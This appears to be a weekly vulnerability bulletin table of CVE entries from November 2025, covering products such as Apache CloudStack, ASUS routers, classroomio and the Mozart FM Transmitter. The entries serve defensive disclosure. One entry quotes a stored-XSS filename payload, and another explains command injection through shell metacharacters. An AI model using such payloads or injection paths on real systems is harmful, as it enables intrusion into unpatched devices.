| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause incorrect control flow behavior. A successful exploit of this vulnerability might lead to data tampering. | 2025-11-25 | 3.2 | CVE-2025-33199 | https://nvd.nist.gov/vuln/detail/CVE-2025-33199 https://www.cve.org/CVERecord?id=CVE-2025-33199 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a resource to be reused. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 2.3 | CVE-2025-33200 | https://nvd.nist.gov/vuln/detail/CVE-2025-33200 https://www.cve.org/CVERecord?id=CVE-2025-33200 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| PHPGurukul--Hostel Management System | A flaw has been found in PHPGurukul Hostel Management System 2.1. The impacted element is an unknown function of the file /register-complaint.php. Manipulation of the argument cdetails can lead to cross-site scripting. The attack can be launched remotely. The exploit has been published and may be used. | 2025-11-24 | 3.5 | CVE-2025-13577 | VDB-333341; PHPGurukul Hostel Management System register-complaint.php cross site scripting VDB-333341; CTI Indicators (IOB, IOC, TTP, IOA); Submit #698995: PHPGurukul Hostel Management System 2.1 Stored Cross Site Scripting; https://phpgurukul.com/ |
| Splunk--Splunk Add-on for Palo Alto Networks | In Splunk Add-on for Palo Alto Networks versions below 2.0.2, the add-on exposes client secrets in plain text in the _internal index during the addition of new "Data Security Accounts". The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) in the Splunk documentation for more information. | 2025-11-26 | 2.7 | CVE-2025-20373 | https://advisory.splunk.com/advisories/SVD-2025-1105 |
| spotipy-dev--spotipy | Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2. | 2025-11-26 | 3.6 | CVE-2025-66040 | https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767 |
| VictoriaMetrics--VictoriaMetrics | VictoriaMetrics is a scalable solution for monitoring and managing time series data. In versions from 1.0.0 to before 1.110.23, from 1.111.0 to before 1.122.8, and from 1.123.0 to before 1.129.1, affected versions are vulnerable to DoS attacks because the snappy decoder ignored VictoriaMetrics request size limits allowing malformed blocks to trigger excessive memory use. This could lead to OOM errors and service instability. The fix enforces block-size checks based on MaxRequest limits. This issue has been patched in versions 1.110.23, 1.122.8, and 1.129.1. | 2025-11-25 | 2.7 | CVE-2025-65942 | https://github.com/VictoriaMetrics/VictoriaMetrics/security/advisories/GHSA-66jq-2c23-2xh5 https://github.com/VictoriaMetrics/VictoriaMetrics/commit/51b44afd34d2c9a392d4ebedeeb5b4a7f5beca24 https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.110.23 https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.122.8 https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.129.1 |
| yungifez--Skuul School Management System | A weakness has been identified in yungifez Skuul School Management System up to 2.6.5. This vulnerability affects unknown code of the file /dashboard/schools/1/edit of the component SVG File Handler. This manipulation causes cross-site scripting. The attack can be carried out remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 2.4 | CVE-2025-13784 | VDB-333788; yungifez Skuul School Management System SVG File edit cross site scripting VDB-333788; CTI Indicators (IOB, IOC, TTP, IOA); Submit #689012: yungifez Skuul v2.6.5 Open Redirect; https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| ACE SECURITY--WIP-90113 HD Camera | ACE SECURITY WIP-90113 HD cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint permits remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup may include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that could facilitate further compromise of the camera or connected network. | 2025-11-26 | not yet calculated | CVE-2020-36874 | https://packetstorm.news/files/id/156497/ https://cxsecurity.com/issue/WLB-2020020137 https://acesecurity.jp/support/top/wip_series/wip-90113 https://www.vulncheck.com/advisories/ace-security-wip90113-unauthenticated-config-disclosure |
| anchore--grype | Grype is a vulnerability scanner for container images and filesystems. A credential disclosure vulnerability was found in Grype, affecting versions 0.68.0 through 0.104.0. If registry credentials are defined and the output of grype is written using the --file or --output json=<file> option, the registry credentials will be included unsanitized in the output file. This issue has been patched in version 0.104.1. Users running affected versions of grype can work around this vulnerability by redirecting stdout to a file instead of using the --file or --output options. | 2025-11-25 | not yet calculated | CVE-2025-65965 | https://github.com/anchore/grype/security/advisories/GHSA-6gxw-85q2-q646 https://github.com/anchore/grype/pull/3068 https://github.com/anchore/grype/commit/39f7fa17af2739cafe9b27176d4a68f7c05f21c1 |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.16, 20.3.14, and 21.0.1, there is an XSRF token leak via protocol-relative URLs in Angular HTTP clients. The vulnerability is a Credential Leak by App Logic that leads to the unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token to an attacker-controlled domain. Angular's HttpClient has a built-in XSRF protection mechanism that works by checking whether a request URL starts with a protocol (http:// or https://) to determine if it is cross-origin. If the URL starts with a protocol-relative prefix (//), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the X-XSRF-TOKEN header. This issue has been patched in versions 19.2.16, 20.3.14, and 21.0.1. A workaround for this issue involves avoiding protocol-relative URLs (URLs starting with //) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single /) or fully qualified, trusted absolute URLs. | 2025-11-26 | not yet calculated | CVE-2025-66035 | https://github.com/angular/angular/security/advisories/GHSA-58c5-g7wp-6w37 https://github.com/angular/angular/commit/0276479e7d0e280e0f8d26fa567d3b7aa97a516f https://github.com/angular/angular/commit/05fe6686a97fa0bcd3cf157805b3612033f975bc https://github.com/angular/angular/commit/3240d856d942727372a705252f7c8c115394a41e https://github.com/angular/angular/releases/tag/19.2.16 https://github.com/angular/angular/releases/tag/20.3.14 https://github.com/angular/angular/releases/tag/21.0.1 |
| Apache Software Foundation--Apache CloudStack | In Apache CloudStack, an improper control of generation of code ('Code Injection') vulnerability is found in the following APIs, which are accessible only to admins: quotaTariffCreate, quotaTariffUpdate, createSecondaryStorageSelector, updateSecondaryStorageSelector, updateHost, updateStorage. This issue affects Apache CloudStack: from 4.18.0 before 4.20.2, from 4.21.0 before 4.22.0. Users are recommended to upgrade to versions 4.20.2 or 4.22.0, which contain the fix. The fix introduces a new global configuration flag, js.interpretation.enabled, allowing administrators to control the interpretation of JavaScript expressions in these APIs, thereby mitigating the code injection risk. | 2025-11-27 | not yet calculated | CVE-2025-59302 | https://lists.apache.org/thread/kwwsg2j85f1b75o0ht5zbr34d7h66788 |
| Apache Software Foundation--Apache CloudStack | In Apache CloudStack, a gap in access control checks affected the APIs createNetworkACL, listNetworkACLs, listResourceDetails, listVirtualMachinesUsageHistory and listVolumesUsageHistory. While these APIs were accessible only to authorized users, insufficient permission validation meant that users could occasionally access information beyond their intended scope. Users are recommended to upgrade to Apache CloudStack 4.20.2.0 or 4.22.0.0, which fixes the issue. | 2025-11-27 | not yet calculated | CVE-2025-59454 | https://lists.apache.org/thread/0hlklvlwhzsfw39nocmyxb6svjbs9xbc |
| Apache Software Foundation--Apache Druid | Apache Druid's Kerberos authenticator uses a weak fallback secret when the `druid.auth.authenticator.kerberos.cookieSignatureSecret` configuration is not explicitly set. In this case, the secret is generated using `ThreadLocalRandom`, which is not a cryptographically secure random number generator. This may allow an attacker to predict or brute force the secret used to sign authentication cookies, potentially enabling token forgery or authentication bypass. Additionally, each process generates its own fallback secret, resulting in inconsistent secrets across nodes. This causes authentication failures in distributed or multi-broker deployments, effectively leading to incorrectly configured clusters. Users are advised to configure a strong `druid.auth.authenticator.kerberos.cookieSignatureSecret`. This issue affects Apache Druid: through 34.0.0. Users are recommended to upgrade to version 35.0.0, which fixes the issue by making it mandatory to set `druid.auth.authenticator.kerberos.cookieSignatureSecret` when using the Kerberos authenticator. Services will fail to come up if the secret is not set. | 2025-11-26 | not yet calculated | CVE-2025-59390 | https://lists.apache.org/thread/jwjltllnntgj1sb9wzsjmvwm9f8rlhg8 |
| Apache Software Foundation--Apache Hive | SQL injection vulnerability in Hive Metastore Server (HMS) when processing delete column statistics requests via the Thrift APIs. The vulnerability is only exploitable by trusted/authorized users/applications that are allowed to call the Thrift APIs directly. In most real-world deployments, HMS is accessible to only a handful of applications (e.g., Hiveserver2), thus the vulnerability is not exploitable. Moreover, the vulnerable code cannot be reached when the metastore.try.direct.sql property is set to false. This issue affects Apache Hive: from 4.1.0 before 4.2.0. Users are recommended to upgrade to version 4.2.0, which fixes the issue. Users who cannot upgrade directly are encouraged to set the metastore.try.direct.sql property to false if the HMS Thrift APIs are exposed to the general public. | 2025-11-26 | not yet calculated | CVE-2025-62728 | https://lists.apache.org/thread/yj65dd8dmzgy8p3nv8zy33v8knzg9o7g |
| Apache Software Foundation--Apache Kvrocks | Improper Privilege Management vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from v2.9.0 through v2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue. | 2025-11-28 | not yet calculated | CVE-2025-59790 | https://lists.apache.org/thread/dlbz5hmm4ts3npzqnvhofxmqg9w9zt0o |
| Apache Software Foundation--Apache Kvrocks | A vulnerability in Apache Kvrocks reveals plaintext credentials in the MONITOR command. This issue affects Apache Kvrocks: from 1.0.0 through 2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue. | 2025-11-28 | not yet calculated | CVE-2025-59792 | https://lists.apache.org/thread/h2pcvr5p9otc7dnj2dt2nr4b3omghddw |
| Apache Software Foundation--Apache SkyWalking | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache SkyWalking. This issue affects Apache SkyWalking: <= 10.2.0. Users are recommended to upgrade to version 10.3.0, which fixes the issue. | 2025-11-27 | not yet calculated | CVE-2025-54057 | https://lists.apache.org/thread/sl2x2tx8y007x0mo746yddx2lvnv9tcr |
| Apache Software Foundation--Apache Syncope | Apache Syncope can be configured to store the user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker who has obtained access to the internal database content to reconstruct the original cleartext password values. This does not affect encrypted plain attributes, whose values are also stored using AES encryption. Users are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue. | 2025-11-24 | not yet calculated | CVE-2025-65998 | https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts |
| Ashlar-Vellum--Cobalt | An Out-of-Bounds Write vulnerability is present in Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior that could allow an attacker to disclose information or execute arbitrary code. | 2025-11-25 | not yet calculated | CVE-2025-65084 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01 |
| Ashlar-Vellum--Cobalt | A Heap-based Buffer Overflow vulnerability is present in Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior that could allow an attacker to disclose information or execute arbitrary code. | 2025-11-25 | not yet calculated | CVE-2025-65085 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01 |
| Astak--CM-818T3 2.4GHz Wireless Security Surveillance Camera | Astak CM-818T3 2.4GHz wireless security surveillance cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint permits remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup may include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that could facilitate further compromise of the camera or connected network. | 2025-11-26 | not yet calculated | CVE-2020-36873 | https://packetstorm.news/files/id/156532/ https://www.vulncheck.com/advisories/astak-cm818t3-unauthenticated-config-disclosure |
| ASUS--MyASUS | A local privilege escalation vulnerability exists in the restore mechanism of ASUS System Control Interface. It can be triggered when an unprivileged actor copies files without proper validation into protected system paths, potentially leading to arbitrary files being executed as SYSTEM. For more information, please refer to section Security Update for MyASUS in the ASUS Security Advisory. | 2025-11-25 | not yet calculated | CVE-2025-59373 | https://www.asus.com/content/security-advisory/ |
| ASUS--Router | A path traversal vulnerability has been identified in WebDAV, which may allow unauthenticated remote attackers to impact the integrity of the device. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-12003 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A stack buffer overflow vulnerability has been identified in certain router models. An authenticated attacker may trigger this vulnerability by sending a crafted request, potentially impacting the availability of the device. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59365 | https://www.asus.com/security-advisory/ |
| ASUS--Router | An authentication-bypass vulnerability exists in AiCloud. This vulnerability can be triggered by an unintended side effect of the Samba functionality, potentially allowing execution of specific functions without proper authorization. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59366 | https://www.asus.com/content/security-advisory/ |
| ASUS--Router | An integer underflow vulnerability has been identified in AiCloud. An authenticated attacker may trigger this vulnerability by sending a crafted request, potentially impacting the availability of the device. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59368 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A SQL injection vulnerability has been identified in bwdpi. A remote, authenticated attacker could leverage this vulnerability to potentially execute arbitrary SQL queries, leading to unauthorized data access. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59369 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A command injection vulnerability has been identified in bwdpi. A remote, authenticated attacker could leverage this vulnerability to potentially execute arbitrary commands, leading to the device executing unintended instructions. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59370 | https://www.asus.com/security-advisory/ |
| ASUS--Router | An authentication bypass vulnerability has been identified in the IFTTT integration feature. A remote, authenticated attacker could leverage this vulnerability to potentially gain unauthorized access to the device. This vulnerability does not affect Wi-Fi 7 series models. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59371 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A path traversal vulnerability has been identified in certain router models. A remote, authenticated attacker could exploit this vulnerability to write files outside the intended directory, potentially affecting device integrity. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59372 | https://www.asus.com/security-advisory/ |
| async_mqtt--Redboltz | Use after free in endpoint destructors in Redboltz async_mqtt 10.2.5 allows local users to cause a denial of service via triggering SSL initialization failure that results in incorrect destruction order between io_context and endpoint objects. | 2025-11-24 | not yet calculated | CVE-2025-65503 | https://github.com/redboltz/async_mqtt/issues/436 https://github.com/redboltz/async_mqtt/pull/437 |
| ATISoluciones--CIGES | A sensitive information disclosure vulnerability exists in the error handling component of ATISoluciones CIGES Application version 2.15.6 and earlier. When certain unexpected conditions trigger unhandled exceptions, the application returns detailed error messages and stack traces to the client. This may expose internal filesystem paths, SQL queries, database connection details, or environment configuration data to remote unauthenticated attackers. This issue allows information gathering and reconnaissance but does not enable direct system compromise. | 2025-11-24 | not yet calculated | CVE-2025-13596 | https://www.atisoluciones.com/incidentes-cve |
| Automated Logic--WebCTRL | The Access Control Bypass vulnerability found in ALC WebCTRL and Carrier i-Vu in versions up to and including 8.5 allows a malicious actor to bypass intended access restrictions and expose sensitive information via the web based building automation server. | 2025-11-27 | not yet calculated | CVE-2024-5539 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| Automated Logic--WebCTRL | The reflective cross-site scripting vulnerability found in ALC WebCTRL and Carrier i-Vu in versions older than 8.0 affects login panels, allowing a malicious actor to compromise the client browser. | 2025-11-27 | not yet calculated | CVE-2024-5540 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| Automated Logic--WebCtrl | A weakness in the Automated Logic and Carrier i-Vu Gen5 router on driver version drv_gen5_106-01-2380 allows malformed packets sent through the BACnet MS/TP network to cause the devices to enter a fault state. This fault state requires a manual power cycle to return the device to network visibility. | 2025-11-27 | not yet calculated | CVE-2025-0657 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| Automated Logic--Zone Controllers | A vulnerability in Automated Logic and Carrier's Zone Controller via the BACnet protocol causes the device to crash. The device enters a fault state; after a reset, a second packet can leave it permanently unresponsive until a manual power cycle is performed. | 2025-11-27 | not yet calculated | CVE-2025-0658 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| BACnet Interoperability Test Services, Inc.--BACnet Test Server | BACnet Test Server versions up to and including 1.01 contains a remote denial of service vulnerability in its BACnet/IP BVLC packet handling. The server fails to properly validate the BVLC Length field in incoming UDP BVLC frames on the default BACnet port (47808/udp). A remote unauthenticated attacker can send a malformed BVLC Length value to trigger an access violation and crash the application, resulting in a denial of service. | 2025-11-26 | not yet calculated | CVE-2020-36872 | https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php https://www.exploit-db.com/exploits/48860 https://packetstormsecurity.com/files/159504 https://cxsecurity.com/issue/WLB-2020100045 https://www.bac-test.com/ https://www.vulncheck.com/advisories/bacnet-test-server-malformed-bvlc-length-dos |
| Beijing Star-Net Ruijie Network Technology Co., Ltd.--NBR Series Routers | Ruijie NBR series routers contain an unauthenticated arbitrary file upload vulnerability via /ddi/server/fileupload.php. The endpoint accepts attacker-supplied values in the name and uploadDir parameters and saves the provided multipart file content without adequate validation or sanitization of file type, path, or extension. A remote attacker can upload a crafted PHP file and then access it from the web root, resulting in arbitrary code execution in the context of the web service. Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-14 UTC. | 2025-11-24 | not yet calculated | CVE-2023-7330 | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml https://cn-sec.com/archives/1995366.html https://www.cnblogs.com/Domren/articles/19093295 https://rfk0z.github.io/posts/Ruijie-NBR-router-fileupload-php-arbitrary-file-upload-vulnerability/ https://www.vulncheck.com/advisories/ruijie-networks-nbr-routers-unauthenticated-arbitrary-file-upload-via-fileuploadphp |
| Bjango--iStats | iStats contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root via command injection. This issue affects iStats: 7.10.4. | 2025-11-24 | not yet calculated | CVE-2025-11921 | https://fluidattacks.com/advisories/muse https://bjango.com/mac/istatmenus/ https://cdn.istatmenus.app/files/istatmenus7/versions/iStatMenus7.10.6.zip |
| body-parser--body-parser | body-parser 2.2.0 is vulnerable to denial of service due to inefficient handling of URL-encoded bodies with very large numbers of parameters. An attacker can send payloads containing thousands of parameters within the default 100KB request size limit, causing elevated CPU and memory usage. This can lead to service slowdown or partial outages under sustained malicious traffic. This issue is addressed in version 2.2.1. | 2025-11-24 | not yet calculated | CVE-2025-13466 | https://github.com/expressjs/body-parser/security/advisories/GHSA-wqch-xfxh-vrr4 |
| cerebrate-project--Cerebrate | UsersController::edit in Cerebrate before 1.30 allows an authenticated non-privileged user to escalate their privileges (e.g., obtain a higher role such as admin) via the user-edit endpoint by supplying or modifying role_id or organisation_id fields in the edit request. | 2025-11-28 | not yet calculated | CVE-2025-66385 | https://github.com/cerebrate-project/cerebrate/compare/v1.29...v1.30 https://github.com/cerebrate-project/cerebrate/commit/c9bfa90abc85d4a20a9cc2f282959b72bef829bb https://vulnerability.circl.lu/api/vulnerability/gcve-1-2025-0017 |
| classroomio--classroomio | An issue was discovered in classroomio 0.1.13. Student accounts are able to delete courses from the Explore page without any authorization or authentication checks, bypassing the expected admin-only deletion restriction. | 2025-11-26 | not yet calculated | CVE-2025-65669 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65669 |
| classroomio--classroomio | An Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows students to access sensitive admin/teacher endpoints by manipulating course IDs in URLs, resulting in unauthorized disclosure of sensitive course, admin, and student data. The leak occurs momentarily before the system reverts to a normal state restricting access. | 2025-11-26 | not yet calculated | CVE-2025-65670 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65670 |
| classroomio--classroomio | Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows unauthorized share and invite access to course settings. | 2025-11-26 | not yet calculated | CVE-2025-65672 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65672 |
| classroomio--classroomio | Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG profile pictures. | 2025-11-26 | not yet calculated | CVE-2025-65675 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65675 |
| classroomio--classroomio | Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG cover images. | 2025-11-26 | not yet calculated | CVE-2025-65676 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65676 |
| CyberArk--CyberArk Secure Web Sessions Extension | Improper Input Validation vulnerability in the CyberArk Secure Web Sessions Extension on Chrome and Edge allows Denial of Service when trying to start new SWS sessions. This issue affects CyberArk Secure Web Sessions Extension: before 2.2.30305. | 2025-11-27 | not yet calculated | CVE-2025-13762 | https://chromewebstore.google.com/detail/cyberark-secure-web-sessi/ohfinlfcbaehgokpmkjcmkgdcbgamgln?hl=en https://microsoftedge.microsoft.com/addons/detail/cyberark-secure-web-sessi/gmfjibhpaliafbemoifjjdkmgaknhohb?hl=en-US |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.1-rc2, LibreChat is vulnerable to Server-side Request Forgery (SSRF), by passing specially crafted OpenAPI specs to its "Actions" feature and making the LLM use those actions. It could be used by an authenticated user with access to this feature to access URLs only accessible to the LibreChat server (such as cloud metadata services, through which impersonation of the server might be possible). This issue has been patched in version 0.8.1-rc2. | 2025-11-29 | not yet calculated | CVE-2025-66201 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-7m2q-fjwr-5x8v |
| Davantis--DFUSION | Inadequate access control vulnerability in Davantis DFUSION v6.177.7, which allows unauthorised actors to extract images and videos related to alarm events through access to "/alarms/<ALARM_ID>/<MEDIA>", where the "MEDIA" parameter can take the value of "snapshot" or "video.mp4". These media files contain images recorded by security cameras in response to triggered alerts. | 2025-11-24 | not yet calculated | CVE-2025-41016 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dfusion-davantis |
| Davantis--DFUSION | Inadequate access control vulnerability in Davantis DFUSION v6.177.7, which allows unauthorised actors to retrieve perspective parameters from security camera settings by accessing "/cameras/<CAMERA_ID>/perspective". | 2025-11-24 | not yet calculated | CVE-2025-41017 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dfusion-davantis |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Upload (status_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform unauthenticated arbitrary file upload via /var/tdf/status_contents.php. | 2025-11-26 | not yet calculated | CVE-2025-66250 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Path Traversal with Arbitrary File Deletion in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to delete arbitrary .tgz files via path traversal in the deletehidden parameter. | 2025-11-26 | not yet calculated | CVE-2025-66251 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Infinite Loop Denial of Service via Failed File Deletion in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to trigger an infinite loop when unlink() fails in status_contents.php, causing DoS. Because the unlink operation is performed inside a while loop, specifying an immutable file, or any file the process lacks permission to delete, makes the script repeatedly attempt the deletion without terminating. | 2025-11-26 | not yet calculated | CVE-2025-66252 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated OS Command Injection (start_upgrade.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows remote code execution via start_upgrade.php because user input is passed directly to exec(). The `/var/tdf/start_upgrade.php` endpoint passes user-controlled `$_GET["filename"]` directly into `exec()` without sanitization or shell escaping. Attackers can inject arbitrary shell commands using metacharacters (`;`, `|`, etc.) to achieve remote code execution as the web server user (likely root). | 2025-11-26 | not yet calculated | CVE-2025-66253 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Deletion (upgrade_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows unauthenticated deletion of arbitrary files via the deleteupgrade parameter. The `deleteupgrade` parameter in `/var/www/upgrade_contents.php` allows unauthenticated deletion of arbitrary files in `/var/www/upload/` without any extension restriction or path sanitization, enabling attackers to remove critical system files. | 2025-11-26 | not yet calculated | CVE-2025-66254 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Upload (upgrade_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows uploading malicious firmware packages because signature validation is missing. The firmware upgrade endpoint in `upgrade_contents.php` accepts arbitrary file uploads without validating file headers or cryptographic signatures, or enforcing .tgz format requirements, allowing malicious firmware injection. This endpoint also subsequently provides ways for arbitrary file uploads and subsequent remote code execution. | 2025-11-26 | not yet calculated | CVE-2025-66255 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Upload (patch_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows uploading malicious files through unrestricted file upload in patch_contents.php. The `/var/tdf/patch_contents.php` endpoint allows unauthenticated arbitrary file uploads without file type validation, MIME checking, or size restrictions beyond 16MB, enabling attackers to upload malicious files. | 2025-11-26 | not yet calculated | CVE-2025-66256 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Deletion (patch_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform The deletepatch parameter allows unauthenticated deletion of arbitrary files. The `deletepatch` parameter in `patch_contents.php` allows unauthenticated deletion of arbitrary files in `/var/www/patch/` directory without sanitization or access control checks. | 2025-11-26 | not yet calculated | CVE-2025-66257 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Stored Cross-Site Scripting via XML Injection in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Stored XSS via crafted filenames injected into patchlist.xml. User-controlled filenames are directly concatenated into `patchlist.xml` without encoding, allowing injection of malicious JavaScript payloads via crafted filenames (e.g., `<img src=x onerror=alert()>.bin`). The XSS executes when ajax.js processes and renders the XML file. | 2025-11-26 | not yet calculated | CVE-2025-66258 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Authenticated Root Remote Code Execution via improrer user input filtering in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform in main_ok.php user supplied data/hour/time is passed directly into date shell command | 2025-11-26 | not yet calculated | CVE-2025-66259 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
